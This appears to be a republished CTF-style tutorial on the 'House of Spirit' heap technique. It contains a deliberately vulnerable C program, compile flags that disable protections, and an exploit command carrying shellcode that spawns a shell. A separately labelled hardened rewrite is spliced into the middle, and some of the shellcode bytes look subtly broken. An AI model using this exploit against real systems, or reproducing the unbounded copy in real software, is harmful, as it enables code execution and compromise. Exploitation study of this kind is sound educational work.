[Overflow exploitation techniques] House of Spirit-friendly stack overflow

2025-01-23 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/01 Report

This note records a stack-overflow exploitation technique (House of Spirit) introduced at L-CTF.

The sample code is as follows:

/* blackngel's vulnerable program slightly modified by gb_master */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void fvuln(char *str1, int age)
{
    char *ptr1, name[32];
    int local_age;
    char *ptr2;

    local_age = age;
    ptr1 = (char *)malloc(256);
    printf("\nPTR1 = [%p]", ptr1);
    strcpy(name, str1);                 /* unbounded copy: overflows name into ptr1 */
    printf("\nPTR1 = [%p]\n", ptr1);
    free(ptr1);                         /* frees whatever ptr1 now points to */
    ptr2 = (char *)malloc(40);          /* may return the chunk just freed */
    snprintf(ptr2, 40 - 1, "%s is %d years old", name, local_age);
    printf("\n%s\n", ptr2);
}

int main(int argc, char *argv[])
{
    int pad[10] = {0, 0, 0, 0, 0, 0, 10, 0, 0};
    if (argc == 3)
        fvuln(argv[1], atoi(argv[2]));
    return 0;
}

The compilation command is as follows:

gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos

To compile on Ubuntu 14 Server you first need the 32-bit development package, otherwise the compiler reports that sys/cdefs.h cannot be found:

sudo apt-get install libc6-dev-i386

The key idea is to use the overflow to overwrite the pointer local variable with an address on the stack, and to place a size field at that fake chunk that is a valid fastbin size, so that free() accepts the fake chunk. The next malloc() of a matching size hands this block of memory back, snprintf() then writes into it, and because the block lies on the stack that write reaches the function's return address, which is what finally yields a shell.
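The root cause above is the unbounded strcpy() into a 32-byte stack buffer; once the adjacent pointer cannot be corrupted, there is no fake chunk for free() to accept. The following is an added example, not part of the original post or blackngel's program: a hardened counterpart of fvuln() (the names fvuln_safe, demo_ok and demo_overlong are assumptions) that rejects overlong names before copying, frees only the pointer malloc() returned, and formats into a caller-provided buffer with its real size.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_MAX 32
#define OUT_MAX  40

/* Hardened counterpart of fvuln() (added example, not the original code).
 * Returns 0 on success and -1 when the name is rejected, so callers can
 * observe the decision instead of relying on printed output. */
int fvuln_safe(const char *str1, int age, char *out, size_t outlen)
{
    char name[NAME_MAX];
    char *ptr1;

    /* Length check before the copy: an overlong name was the only way the
     * original overflowed 'name' into the neighbouring ptr1 variable. */
    if (str1 == NULL || strlen(str1) >= sizeof name)
        return -1;
    strcpy(name, str1);              /* safe: length already bounded */

    ptr1 = malloc(256);
    if (ptr1 == NULL)
        return -1;
    /* ... the heap buffer would be used here ... */
    free(ptr1);                      /* ptr1 is still the pointer malloc() returned */
    ptr1 = NULL;                     /* rule out reuse or a second free */

    /* Format into the caller's buffer using its true size, not into a
     * freshly allocated chunk whose origin depends on earlier frees. */
    snprintf(out, outlen, "%s is %d years old", name, age);
    return 0;
}

/* Demo 1: a normal name is accepted; returns the formatted string. */
const char *demo_ok(void)
{
    static char out[OUT_MAX];
    if (fvuln_safe("Bob", 48, out, sizeof out) != 0)
        return "rejected";
    return out;
}

/* Demo 2: a constructed 60-byte name (longer than the 32-byte buffer) is
 * rejected before any copy happens, so nothing adjacent can be overwritten. */
int demo_overlong(void)
{
    char out[OUT_MAX];
    char big[61];
    memset(big, 'A', 60);
    big[60] = '\0';
    return fvuln_safe(big, 48, out, sizeof out);   /* -1 */
}

int main(void)
{
    printf("%s\n", demo_ok());
    printf("overlong name -> %d\n", demo_overlong());
    return 0;
}
```

Compiled with the same flags as hos.c, the overlong input that previously rewrote ptr1 is now refused up front, so free() only ever sees a genuine heap pointer and the later malloc() cannot return stack memory.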

The memory distribution of local variables is as follows:

0xffffd03c  name
0xffffd05c  ptr2
0xffffd060  ptr1
0xffffd064  local_age

The test command is as follows:

./hos `python -c 'import sys; sys.stdout.write("\x31\xc0\xeb\x14\x44\xd0\xff\xff\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x69\x6e\x89\xe3\x31\xc9\x89\xcd\x80\x90" + "\x01\xd0\xff\xff" + "\x30")'` 48

One problem remains: the shell is obtained when running under GDB, but executing the binary directly produces a segmentation fault.
